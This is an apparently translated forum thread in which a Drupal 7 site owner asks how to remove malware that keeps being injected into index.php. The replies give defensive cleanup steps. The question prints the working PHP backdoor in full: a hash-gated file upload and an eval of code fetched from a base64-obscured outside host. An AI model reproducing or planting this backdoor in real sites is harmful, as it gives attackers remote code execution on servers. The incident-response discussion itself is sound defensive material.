Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
K
K
Konstantin2018-04-09 06:35:49
Drupal
Konstantin, 2018-04-09 06:35:49

How to catch a virus on a Drupal 7 website?

It all started very suddenly, in some miraculous way, this code is sewn into index.php ..

ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
  move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
  eval(file_get_contents(base64_decode('aHR0cDovLzAyby5vcmcvdy8/dT0=').$sh.'&c='.$c));
}

All suspicious modules and folders were annihilated. But it didn’t get better and periodically this code is sewn in. Shelov did not find any changes to files and folders either.

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

5 answer(s)
Report
B
Boris Syomov, 2018-04-09
@kotomyava

0. Always update in a timely manner.
1. Remove all contributory modules and core, and reinstall from drupal.org.
2. Check if there are any extra users with high rights.
3. Check if php_filter is used, if it is used somewhere, remake and disable it completely. Also, if the publication is available to users, check that the most restrictive input filters are used.
4. Conduct an audit of self-written modules, if any, and design themes.
5. If possible, disable the execution of php scripts in the sites/*/files folder at the web server configuration level (not .htaccess)
6. If possible, make sure that the user under which the web server is running has write access only to sites/*/files, and a temporary folder outside the site root, and make all updates through drush, for example, already under the owner files.

Report
S
SunHere, 2018-05-03
@SunHere

Drupal is now often broken, and it has enough vulnerabilities. It is quite possible that you are missing something and it is through the remaining 1 virus file that everything reappears

Report
X
xmoonlight, 2018-04-09
@xmoonlight

How to protect websites from hacking?

Report
A
afi13, 2018-04-09
@afi13

0. Make a full site backup (files + database)
1. Use the hacked module to find modified files https://www.drupal.org/project/hacked
2. Check that there are no "left" PHP files unrelated to Drupal (they can be loaded into any module).
3. Check all nodes, blocks, users, fields, etc. If this is not possible manually, then some kind of script is needed.
4. Check users and their roles. Both left users and roles in Drupal can be added.
5. Update Drupal and all modules to the latest version https://www.drupal.org/project/drupal/releases/7.58
6. Change admin passwords
See details here: https://www.drupal.org/docs/develop/ security/your-...

Report
A
Alexander Alexandrov, 2018-04-11
@BraveHeart

Try to scan with the ai-bolit script (or similar), it will show where the shells are. Then update completely and change passwords.

Similar questions
L
lexchz2016-03-19 17:48:31
How to return view mode announcement (teaser) in Drupal 8? 1Reply
A
andreystrelkov2013-12-24 13:40:59
How to create city address book for Drupal Openlayers? 1Reply
Z
Z_Coder2014-01-02 16:18:05
How to disable display of word body in drupal 7 search snippet? 1Reply
V
Vlad1712016-03-28 22:39:38
Where did the comment editing button go (Drupal7)? 2Reply
R
RGoldvarg2016-03-28 23:17:08
Which CMS to choose for a news publisher? 4Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question